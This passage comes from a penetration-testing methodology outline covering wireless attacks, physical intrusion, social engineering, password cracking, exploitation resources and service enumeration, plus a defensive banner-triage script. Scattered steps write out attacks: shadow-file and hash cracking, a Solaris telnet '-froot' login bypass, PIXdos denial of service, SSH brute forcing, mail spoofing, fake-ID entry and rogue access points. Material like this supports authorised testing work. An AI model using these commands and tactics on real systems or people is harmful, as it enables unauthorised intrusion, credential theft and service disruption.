7.2.1.16. WirelessMon

7.2.1.17. WiFiFoFum

7.2.2. Packet Capture

7.2.2.1. Airopeek

7.2.2.2. Airpcap

7.2.2.3. Airtraf

7.2.2.4. Apsniff

7.2.2.5. Cain

7.2.2.6. Commview

7.2.2.7. Ettercap

7.2.2.8. Netmon

7.2.2.8.1. nmwifi

7.2.2.9. Wireshark

7.2.3. EAP Attack tools

7.2.3.1. eapmd5pass

7.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

7.2.4. Leap Attack Tools

7.2.4.1. asleap

7.2.4.2. thc leap cracker

7.2.4.3. anwrap

7.2.5. WEP/ WPA Password Attack Tools

7.2.5.1. Airbase

7.2.5.2. Aircrack-ptw

7.2.5.3. Aircrack-ng

7.2.5.4. Airsnort

7.2.5.5. cowpatty

7.2.5.6. FiOS Wireless Key Calculator

7.2.5.7. iWifiHack

7.2.5.8. KisMAC-ng

7.2.5.9. Rainbow Tables

7.2.5.10. wep attack

7.2.5.11. wep crack

7.2.5.12. wzcook

7.2.6. Frame Generation Software

7.2.6.1. Airgobbler

7.2.6.2. airpwn

7.2.6.3. Airsnarf

7.2.6.4. Commview

7.2.6.5. fake ap

7.2.6.6. void 11

7.2.6.7. wifi tap

7.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

7.2.6.8. FreeRADIUS - Wireless Pwnage Edition

7.2.7. Mapping Software

7.2.7.1. Online Mapping

7.2.7.1.1. WIGLE

7.2.7.1.2. Skyhook

7.2.7.2. Tools

7.2.7.2.1. Knsgem

7.2.8. File Format Conversion Tools

7.2.8.1. ns1 recovery and conversion tool

7.2.8.2. warbable

7.2.8.3. warkizniz

7.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

7.2.8.4. ivstools

7.2.9. IDS Tools

7.2.9.1. WIDZ

7.2.9.2. War Scanner

7.2.9.3. Snort-Wireless

7.2.9.4. AirDefense

7.2.9.5. AirMagnet

7.3. WLAN discovery

7.3.1. Unencrypted WLAN

7.3.1.1. Visible SSID

7.3.1.1.1. Sniff for IP range

7.3.1.2. Hidden SSID

7.3.1.2.1. Deauth client

7.3.2. WEP encrypted WLAN

7.3.2.1. Visible SSID

7.3.2.1.1. WEPattack

7.3.2.2. Hidden SSID

7.3.2.2.1. Deauth client

7.3.3. WPA / WPA2 encrypted WLAN

7.3.3.1. Deauth client

7.3.3.1.1. Capture EAPOL handshake

7.3.4. LEAP encrypted WLAN

7.3.4.1. Deauth client

7.3.4.1.1. Break LEAP

7.3.5. 802.1x WLAN

7.3.5.1. Create Rogue Access Point

7.3.5.1.1. Airsnarf

7.3.5.1.2. fake ap

7.3.5.1.3. Hotspotter

7.3.5.1.4. Karma

7.3.5.1.5. Linux rogue AP

7.3.6. Resources

7.3.6.1. URL's

7.3.6.1.1. Wirelessdefence.org

7.3.6.1.2. Russix

7.3.6.1.3. Wardrive.net

7.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

7.3.6.2. White Papers

7.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

7.3.6.2.2. 802.11b Firmware-Level Attacks

7.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

7.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

7.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

7.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

7.3.6.2.7. Active behavioral fingerprinting of wireless devices

7.3.6.3. Common Vulnerabilities and Exploits (CVE)

7.3.6.3.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

8. Physical Security

8.1. Building Security

8.1.1. Meeting Rooms

8.1.1.1. Check for active network jacks.

8.1.1.2. Check for any information in room.

8.1.2. Lobby

8.1.2.1. Check for active network jacks.

8.1.2.2. Does receptionist/guard leave lobby?

8.1.2.3. Accessible printers? Print test page.

8.1.2.4. Obtain phone/personnel listing.

8.1.3. Communal Areas

8.1.3.1. Check for active network jacks.

8.1.3.2. Check for any information in room.

8.1.3.3. Listen for employee conversations.

8.1.4. Room Security

8.1.4.1. Resistance of lock to picking.

8.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?

8.1.4.2. Ceiling access areas.

8.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

8.1.5. Windows

8.1.5.1. Check windows/doors for visible intruder alarm sensors.

8.1.5.2. Check visible areas for sensitive information.

8.1.5.3. Can you video users logging on?

8.2. Perimeter Security

8.2.1. Fence Security

8.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

8.2.2. Exterior Doors

8.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

8.2.3. Guards

8.2.3.1. Patrol Routines

8.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

8.2.3.2. Communications

8.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

8.3. Entry Points

8.3.1. Guarded Doors

8.3.1.1. Piggybacking

8.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.

8.3.1.2. Fake ID

8.3.1.2.1. Attempt to use fake ID to gain access.

8.3.1.3. Access Methods

8.3.1.3.1. Test 'out of hours' entry methods

8.3.2. Unguarded Doors

8.3.2.1. Identify all unguarded entry points.

8.3.2.1.1. Are doors secured?

8.3.2.1.2. Check locks for resistance to lock picking.

8.3.3. Windows

8.3.3.1. Check windows/doors for visible intruder alarm sensors.

8.3.3.1.1. Attempt to bypass sensors.

8.3.3.2. Check visible areas for sensitive information.

8.4. Office Waste

8.4.1. Dumpster Diving - Attempt to retrieve any useful information from ToE (Target of Evaluation) refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.

9. Password cracking

9.1. Rainbow crack

9.1.1. ophcrack

9.1.2. rainbow tables

9.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

9.2. Ophcrack

9.3. Cain & Abel

9.4. John the Ripper

9.4.1. ./unshadow passwd shadow > file_to_crack

9.4.2. ./john -single file_to_crack

9.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

9.4.4. ./john -show file_to_crack

9.4.5. ./john --incremental:All file_to_crack

9.5. fgdump

9.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

9.6. pwdump6

9.6.1. pwdump [-h][-o][-u][-p] machineName

9.7. medusa

9.8. LCP

9.9. L0phtcrack (Note: this tool was acquired by Symantec from @stake and it is their policy not to ship it outside the USA and Canada)

9.9.1. Domain credentials

9.9.2. Sniffing

9.9.3. pwdump import

9.9.4. sam import

9.10. aiocracker

9.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

10. Vulnerability Assessment - Using vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether there are any vulnerabilities that could be exploited to gain access to a target host on the network. A number of the tests carried out by these scanners are just banner grabbing/obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released, and the result is reported to the user. Other tools actually use manual pen testing methods and display the output received, e.g. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
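The "compare the grabbed version with the published advisories" step is easy to automate and easy to over-trust. The following is an added example (not one of the scanners listed, and not their logic) that reads the nmap -oX output produced by the scan at 2.2.1.1.1, compares each detected product/version against a small advisory table, and keeps "banner says older than the fix" separate from "confirmed". The XML document, the hosts and ports, the advisory table and the ADV-PLACEHOLDER identifiers are all constructed for the demo; real advisory IDs and fixed-in versions come from the vendor or the CVE/NVD entries.

```python
"""Banner-version triage over nmap XML output (added example).
The XML and the advisory table below are constructed for the demo; the
advisory IDs are placeholders, not real CVE numbers."""
from __future__ import annotations
import re
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX nmap.syn.results.xml 192.0.2.0/28">
  <host><status state="up" reason="syn-ack"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.10" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="25"><state state="closed" reason="reset"/></port>
    </ports></host>
  <host><status state="up" reason="syn-ack"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/>
        <service name="https" method="table" conf="3"/></port>
    </ports></host>
</nmaprun>"""

# Constructed advisory table: (product as nmap names it, first fixed version, placeholder id).
ADVISORIES = [
    ("OpenSSH", "7.6", "ADV-PLACEHOLDER-1"),
    ("Apache httpd", "2.4.25", "ADV-PLACEHOLDER-2"),
]


def version_key(v: str) -> tuple[int, ...]:
    """Numeric tuple so 7.10 sorts after 7.9; a suffix such as 8.9p1 is ignored."""
    m = re.match(r"[\d.]+", v)
    return tuple(int(x) for x in m.group(0).split(".") if x) if m else ()


def open_services(xml_text: str):
    """Yield one record per open port, with whatever version data nmap recorded."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            yield {
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
                "method": svc.get("method") if svc is not None else None,
            }


def assess(xml_text: str) -> list[dict]:
    """Banner-only triage: flags versions below the fixed-in version and
    separately lists services whose version could not be read at all."""
    findings = []
    for s in open_services(xml_text):
        if not s["product"] or not s["version"]:
            findings.append({**s, "status": "unknown: no version banner, probe manually"})
            continue
        for product, fixed_in, adv in ADVISORIES:
            if s["product"] == product and version_key(s["version"]) < version_key(fixed_in):
                findings.append({**s, "status": f"possible {adv}: banner {s['version']} < {fixed_in}, confirm"})
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_NMAP_XML):
        print(f"{f['host']}:{f['port']}/{f['proto']} {f['product']} {f['version']} -> {f['status']}")
```

Everything this produces is a lead, which is why the status strings say "possible" and "confirm": distributions backport fixes without changing the banner version, banners can be edited, and the service on port 443 shows the opposite failure, an open port with no version to compare at all. The confirmed-vulnerabilities nodes under 10.1 and 10.2 are for what survives manual verification.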

10.1. Manual

10.1.1. Patch Levels

10.1.2. Confirmed Vulnerabilities

10.1.2.1. Severe

10.1.2.2. High

10.1.2.3. Medium

10.1.2.4. Low

10.2. Automated

10.2.1. Reports

10.2.2. Vulnerabilities

10.2.2.1. Severe

10.2.2.2. High

10.2.2.3. Medium

10.2.2.4. Low

10.3. Tools

10.3.1. GFI

10.3.2. Nessus (Linux)

10.3.2.1. Nessus (Windows)

10.3.3. NGS Typhon

10.3.4. NGS Squirrel for Oracle

10.3.5. NGS Squirrel for SQL

10.3.6. SARA

10.3.7. MatriXay

10.3.8. BiDiBlah

10.3.9. SSA

10.3.10. Oval Interpreter

10.3.11. Xscan

10.3.12. Security Manager +

10.3.13. Inguma

10.4. Resources

10.4.1. Security Focus

10.4.2. Microsoft Security Bulletin

10.4.3. Common Vulnerabilities and Exploits (CVE)

10.4.4. National Vulnerability Database (NVD)

10.4.5. The Open Source Vulnerability Database (OSVDB)

10.4.5.1. Standalone Database

10.4.5.1.1. Update URL

10.4.6. United States Computer Emergency Response Team (US-CERT)

10.4.7. Computer Emergency Response Team

10.4.8. Mozilla Security Information

10.4.9. SANS

10.4.10. Securiteam

10.4.11. PacketStorm Security

10.4.12. Security Tracker

10.4.13. Secunia

10.4.14. Vulnerabilities.org

10.4.15. ntbugtraq

10.4.16. Wireless Vulnerabilities and Exploits (WVE)

10.5. Blogs

10.5.1. Carnal0wnage

10.5.2. Fsecure Blog

10.5.3. g0ne blog

10.5.4. GNUCitizen

10.5.5. ha.ckers Blog

10.5.6. Jeremiah Grossman Blog

10.5.7. Metasploit

10.5.8. nCircle Blogs

10.5.9. pentestmonkey.net

10.5.10. Rational Security

10.5.11. Rise Security

10.5.12. Security Fix Blog

10.5.13. Software Vulnerability Exploitation Blog

10.5.14. Taosecurity Blog

11. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are essentially, at the lowest level, pre-compiled point-and-shoot tools. These engines also have a number of other extra underlying features for more advanced users.

11.1. Password Attacks

11.1.1. Known Accounts

11.1.1.1. Identified Passwords

11.1.1.2. Unidentified Hashes

11.1.2. Default Accounts

11.1.2.1. Identified Passwords

11.1.2.2. Unidentified Hashes

11.2. Exploits

11.2.1. Successful Exploits

11.2.1.1. Accounts

11.2.1.1.1. Passwords

11.2.1.1.2. Groups

11.2.1.1.3. Other Details

11.2.1.2. Services

11.2.1.3. Backdoor

11.2.1.4. Connectivity

11.2.2. Unsuccessful Exploits

11.2.3. Resources

11.2.3.1. Securiteam

11.2.3.1.1. Exploits are sorted by year and must be downloaded individually

11.2.3.2. SecurityForest

11.2.3.2.1. Updated via CVS after initial install

11.2.3.3. GovernmentSecurity

11.2.3.3.1. Need to create an account to obtain access

11.2.3.4. Red Base Security

11.2.3.4.1. Oracle Exploit site only

11.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

11.2.3.5.1. Wireless Exploit Site

11.2.3.6. PacketStorm Security

11.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

11.2.3.7. SecWatch

11.2.3.7.1. Exploits sorted by year and month, download separately

11.2.3.8. SecurityFocus

11.2.3.8.1. Exploits must be downloaded individually

11.2.3.9. Metasploit

11.2.3.9.1. Install and regularly update via svn

11.2.3.10. Milw0rm

11.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!

11.3. Tools

11.3.1. Metasploit

11.3.1.1. Free Extra Modules

11.3.1.1.1. local copy

11.3.2. Manual SQL Injection

11.3.2.1. Understanding SQL Injection

11.3.2.2. SQL Injection walkthrough

11.3.2.3. SQL Injection by example

11.3.2.4. Blind SQL Injection

11.3.2.5. Advanced SQL Injection in SQL Server

11.3.2.6. More Advanced SQL Injection

11.3.2.7. Advanced SQL Injection in Oracle databases

11.3.2.8. SQL Cheatsheets

11.3.3. SQL Power Injector

11.3.4. SecurityForest

11.3.5. SPI Dynamics WebInspect

11.3.6. Core Impact

11.3.7. Cisco Global Exploiter

11.3.8. PIXDos

11.3.8.1. perl PIXdos.pl [--device=interface] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

11.3.9. CANVAS

11.3.10. Inguma

12. Network Backbone

12.1. Generic Toolset

12.1.1. Wireshark (Formerly Ethereal)

12.1.1.1. Passive Sniffing

12.1.1.1.1. Usernames/Passwords

12.1.1.1.2. Email

12.1.1.1.3. FTP

12.1.1.1.4. HTTP

12.1.1.1.5. HTTPS

12.1.1.1.6. RDP

12.1.1.1.7. VOIP

12.1.1.1.8. Other

12.1.1.2. Filters

12.1.1.2.1. ip.src == ip_address

12.1.1.2.2. ip.dst == ip_address

12.1.1.2.3. tcp.dstport == port_no.

12.1.1.2.4. ! ip.addr == ip_address

12.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

12.1.2. Cain & Abel

12.1.2.1. Active Sniffing

12.1.2.1.1. ARP Cache Poisoning

12.1.2.1.2. DNS Poisoning

12.1.2.1.3. Routing Protocols

12.1.3. Cisco-Torch

12.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

12.1.4. NTP-Fingerprint

12.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

12.1.5. Yersinia

12.1.6. p0f

12.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

12.1.7. Manual Check (Credentials required)

12.1.8. MAC Spoofing

12.1.8.1. mac address changer for windows

12.1.8.2. macchanger

12.1.8.2.1. Random Mac Address:- macchanger -r eth0

12.1.8.3. madmacs

12.1.8.4. smac

12.1.8.5. TMAC

13. Contributors

13.1. Matt Byrne (WirelessDefence.org)

13.1.1. Matt contributed the majority of the Wireless section.

13.2. Arvind Doraiswamy (Paladion.net)

13.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

13.3. Lee Lawson (Dns.co.uk)

13.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

13.4. Nabil OUCHN (Security-database.com)

13.4.1. Nabil contributed the AS/400 section.

14. Pre-Inspection Visit - template

15. Network Footprinting (Reconnaissance) - The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms: active and passive. A passive approach is always the best starting point, as it would normally not trigger intrusion detection systems and other forms of protection afforded to the network. This usually involves discovering publicly available information using a web browser, visiting newsgroups and so on. An active form is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

15.1. Untitled

15.1.1. Authoritative Bodies

15.1.1.1. IANA - Internet Assigned Numbers Authority

15.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.

15.1.1.3. NRO - Number Resource Organisation

15.1.1.4. RIR - Regional Internet Registry

15.1.1.4.1. AFRINIC - African Network Information Centre

15.1.1.4.2. APNIC - Asia Pacific Network Information Centre

15.1.1.4.3. ARIN - American Registry for Internet Numbers

15.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre

15.1.1.4.5. RIPE - Réseaux IP Européens Network Coordination Centre

15.1.2. Websites

15.1.2.1. Central Ops

15.1.2.1.1. Domain Dossier

15.1.2.1.2. Email Dossier

15.1.2.2. DNS Stuff

15.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.

15.1.2.3. Fixed Orbit

15.1.2.3.1. Autonomous System lookups and other online tools available.

15.1.2.4. Geektools

15.1.2.5. IP2Location

15.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.

15.1.2.6. Kartoo

15.1.2.6.1. Metasearch engine that visually presents its results.

15.1.2.7. MyIPNeighbors.com

15.1.2.7.1. Excellent site that gives details of the domains sharing the IP queried, and conversely IP to DNS resolution

15.1.2.8. My-IP-Neighbors.com

15.1.2.8.1. Excellent site that can be used if the above is down

15.1.2.9. myipneighbors.net

15.1.2.10. Netcraft

15.1.2.10.1. Online search tool allowing queries for host information.

15.1.2.11. Passive DNS Replication

15.1.2.11.1. Finds shared domains based on supplied IP addresses

15.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script

15.1.2.12. Robtex

15.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.

15.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)

15.1.2.13. Traceroute.org

15.1.2.13.1. Website listing a large number of links to online traceroute resources.

15.1.2.14. Wayback Machine

15.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

15.1.2.15. Whois.net

15.1.3. Tools

15.1.3.1. Cheops-ng

15.1.3.2. Country whois

15.1.3.3. Domain Research Tool

15.1.3.4. Firefox Plugins

15.1.3.4.1. AS Number

15.1.3.4.2. Shazou

15.1.3.4.3. Firecat Suite

15.1.3.5. Gnetutil

15.1.3.6. Goolag Scanner

15.1.3.7. Greenwich

15.1.3.8. Maltego

15.1.3.9. GTWhois

15.1.3.10. Sam Spade

15.1.3.11. Smart whois

15.1.3.12. SpiderFoot

15.2. Internet Search

15.2.1. General Information

15.2.1.1. Web Investigator

15.2.1.2. Tracesmart

15.2.1.3. Friends Reunited

15.2.1.4. Ebay - profiles etc.

15.2.2. Financial

15.2.2.1. EDGAR - Company information, including real-time filings. US

15.2.2.2. Google Finance - General Finance Portal

15.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK

15.2.2.4. Companies House UK

15.2.2.5. Land Registry UK

15.2.3. Phone book/ Electoral Roll Information

15.2.3.1. 123people

15.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world

15.2.3.2. 192.com

15.2.3.2.1. Electoral Roll Search. UK

15.2.3.3. 411

15.2.3.3.1. Online White Pages and Yellow Pages. US

15.2.3.4. Untitled

15.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US

15.2.3.5. BT.com. UK

15.2.3.5.1. Residential

15.2.3.5.2. Business

15.2.3.6. Pipl

15.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1

15.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1

15.2.3.7. Spokeo

15.2.3.7.1. http://www.spokeo.com/user?q=domain_name

15.2.3.7.2. http://www.spokeo.com/user?q=email_address

15.2.3.8. Yasni

15.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword

15.2.3.9. Zabasearch

15.2.3.9.1. People Search Engine. US

15.2.4. Generic Web Searching

15.2.4.1. Code Search

15.2.4.2. Forum Entries

15.2.4.3. Google Hacking Database

15.2.4.4. Google

15.2.4.4.1. Back end files

15.2.4.4.2. Email Addresses

15.2.4.4.3. Contact Details

15.2.4.5. Newsgroups/forums

15.2.4.6. Blog Search

15.2.4.6.1. Yammer

15.2.4.6.2. Google Blog Search

15.2.4.6.3. Technorati

15.2.4.6.4. Jaiku

15.2.4.6.5. Present.ly

15.2.4.6.6. Twitter Network Browser

15.2.4.7. Search Engine Comparison/ Aggregator Sites

15.2.4.7.1. Clusty

15.2.4.7.2. Grokker

15.2.4.7.3. Zuula

15.2.4.7.4. Exalead

15.2.4.7.5. Delicious

15.2.5. Metadata Search

15.2.5.1. Untitled

15.2.5.1.1. MetaData Visualisation Sites

15.2.5.1.2. Tools

15.2.5.1.3. Wikipedia Metadata Search

15.2.6. Social/ Business Networks

15.2.6.1. Untitled

15.2.6.1.1. Africa

15.2.6.1.2. Australia

15.2.6.1.3. Belgium

15.2.6.1.4. Holland

15.2.6.1.5. Hungary

15.2.6.1.6. Iran

15.2.6.1.7. Japan

15.2.6.1.8. Korea

15.2.6.1.9. Poland

15.2.6.1.10. Russia

15.2.6.1.11. Sweden

15.2.6.1.12. UK

15.2.6.1.13. US

15.2.6.1.14. Assorted

15.2.7. Resources

15.2.7.1. OSINT

15.2.7.2. International Directory of Search Engines

15.3. DNS Record Retrieval from publicly available servers

15.3.1. Types of Information Records

15.3.1.1. SOA Records - Indicates the server that has authority for the domain.

15.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).

15.3.1.3. NS Records - List of a host’s or domain’s name server(s).

15.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.

15.3.1.5. PTR Records - Reverse lookup record that maps an IP address back to a host's domain name.

15.3.1.6. SRV Records - Service location record.

15.3.1.7. HINFO Records - Host information record with CPU type and operating system.

15.3.1.8. TXT Records - Generic text record.

15.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.

15.3.1.10. RP - Responsible person for the domain.

15.3.2. Database Settings

15.3.2.1. Version.bind

15.3.2.2. Serial

15.3.2.3. Refresh

15.3.2.4. Retry

15.3.2.5. Expiry

15.3.2.6. Minimum

15.3.3. Sub Domains

15.3.4. Internal IP ranges

15.3.4.1. Reverse DNS for IP Range

15.3.5. Zone Transfer

15.4. Social Engineering

15.4.1. Remote

15.4.1.1. Phone

15.4.1.1.1. Scenarios

15.4.1.1.2. Results

15.4.1.1.3. Contact Details

15.4.1.2. Email

15.4.1.2.1. Scenarios

15.4.1.2.2. Software

15.4.1.2.3. Results

15.4.1.2.4. Contact Details

15.4.1.3. Other

15.4.2. Local

15.4.2.1. Personas

15.4.2.1.1. Name

15.4.2.1.2. Phone

15.4.2.1.3. Email

15.4.2.1.4. Business Cards

15.4.2.2. Contact Details

15.4.2.2.1. Name

15.4.2.2.2. Phone number

15.4.2.2.3. Email

15.4.2.2.4. Room number

15.4.2.2.5. Department

15.4.2.2.6. Role

15.4.2.3. Scenarios

15.4.2.3.1. New IT employee

15.4.2.3.2. Fire Inspector

15.4.2.4. Results

15.4.2.5. Maps

15.4.2.5.1. Satellite Imagery

15.4.2.5.2. Building layouts

15.4.2.6. Other

15.5. Dumpster Diving

15.5.1. Rubbish Bins

15.5.2. Contract Waste Removal

15.5.3. Ebay ex-stock sales i.e. HDD

15.6. Web Site copy

15.6.1. httrack

15.6.2. teleport pro

15.6.3. Black Widow

16. Enumeration

16.1. Daytime port 13 open

16.1.1. nmap nse script

16.1.1.1. daytime

16.2. FTP port 21 open

16.2.1. Fingerprint server

16.2.1.1. telnet ip_address 21 (Banner grab)

16.2.1.2. Run command ftp ip_address

16.2.1.3. [email protected]

16.2.1.4. Check for anonymous access

16.2.1.4.1. ftp ip_address (Username: anonymous OR anon; Password: [email protected])

16.2.2. Password guessing

16.2.2.1. Hydra brute force

16.2.2.2. medusa

16.2.2.3. Brutus

16.2.3. Examine configuration files

16.2.3.1. ftpusers

16.2.3.2. ftp.conf

16.2.3.3. proftpd.conf

16.2.4. MiTM

16.2.4.1. pasvagg.pl

16.3. SSH port 22 open

16.3.1. Fingerprint server

16.3.1.1. telnet ip_address 22 (banner grab)

16.3.1.2. scanssh

16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

16.3.2. Password guessing

16.3.2.1. ssh root@ip_address

16.3.2.2. guess-who

16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

16.3.2.3. Hydra brute force

16.3.2.4. brutessh

16.3.2.5. Ruby SSH Bruteforcer

16.3.3. Examine configuration files

16.3.3.1. ssh_config

16.3.3.2. sshd_config

16.3.3.3. authorized_keys

16.3.3.4. ssh_known_hosts

16.3.3.5. .shosts

16.3.4. SSH Client programs

16.3.4.1. tunnelier

16.3.4.2. winsshd

16.3.4.3. putty

16.3.4.4. winscp

16.4. Telnet port 23 open

16.4.1. Fingerprint server

16.4.1.1. telnet ip_address

16.4.1.1.1. Common Banner List (OS: Banner)

16.4.1.1.1.1. Solaris 8: SunOS 5.8

16.4.1.1.1.2. Solaris 2.6: SunOS 5.6

16.4.1.1.1.3. Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)

16.4.1.1.1.4. SunOS 4.1.x: SunOS Unix (hostname)

16.4.1.1.1.5. FreeBSD: FreeBSD/i386 (hostname) (ttyp1)

16.4.1.1.1.6. NetBSD: NetBSD/i386 (hostname) (ttyp1)

16.4.1.1.1.7. OpenBSD: OpenBSD/i386 (hostname) (ttyp1)

16.4.1.1.1.8. Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)

16.4.1.1.1.9. Debian 3.0: Debian GNU/Linux 3.0 / hostname

16.4.1.1.1.10. SGI IRIX 6.x: IRIX (hostname)

16.4.1.1.1.11. IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.

16.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.

16.4.1.1.1.13. Nokia IPSO: IPSO (hostname) (ttyp0)

16.4.1.1.1.14. Cisco IOS: User Access Verification

16.4.1.1.1.15. Livingston ComOS: ComOS - Livingston PortMaster

16.4.1.2. telnetfp

16.4.2. Password Attack

16.4.2.2. Hydra brute force

16.4.2.3. Brutus

16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)

16.4.3. Examine configuration files

16.4.3.1. /etc/inetd.conf

16.4.3.2. /etc/xinetd.d/telnet

16.4.3.3. /etc/xinetd.d/stelnet

16.5. Sendmail Port 25 open

16.5.1. Fingerprint server

16.5.1.1. telnet ip_address 25 (banner grab)

16.5.2. Mail Server Testing

16.5.2.1. Enumerate users

16.5.2.1.1. VRFY username (verifies whether the mailbox/username exists - enumeration of accounts)

16.5.2.1.2. EXPN username (expands a mailing list or alias to its member addresses - enumeration of accounts)

16.5.2.2. Mail Spoof Test

16.5.2.2.1. Manual SMTP session, one command per line

16.5.2.2.1.1. HELO anything

16.5.2.2.1.2. MAIL FROM: spoofed_address

16.5.2.2.1.3. RCPT TO: valid_mail_account

16.5.2.2.1.4. DATA

16.5.2.2.1.5. . (a single dot on a line by itself ends the message body)

16.5.2.2.1.6. QUIT

16.5.2.3. Mail Relay Test

16.5.3. Examine Configuration Files

16.5.3.1. sendmail.cf

16.5.3.2. submit.cf

16.6. DNS port 53 open

16.6.1. Fingerprint server/ service

16.6.1.1. host

16.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]

16.6.1.1.1.1. -v verbose format

16.6.1.1.1.2. -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.

16.6.1.1.1.3. -a Same as -t ANY.

16.6.1.1.1.4. -l Zone transfer (if allowed).

16.6.1.1.1.5. -f Save to a specified filename.

16.6.1.2. nslookup

16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

16.6.1.3. dig

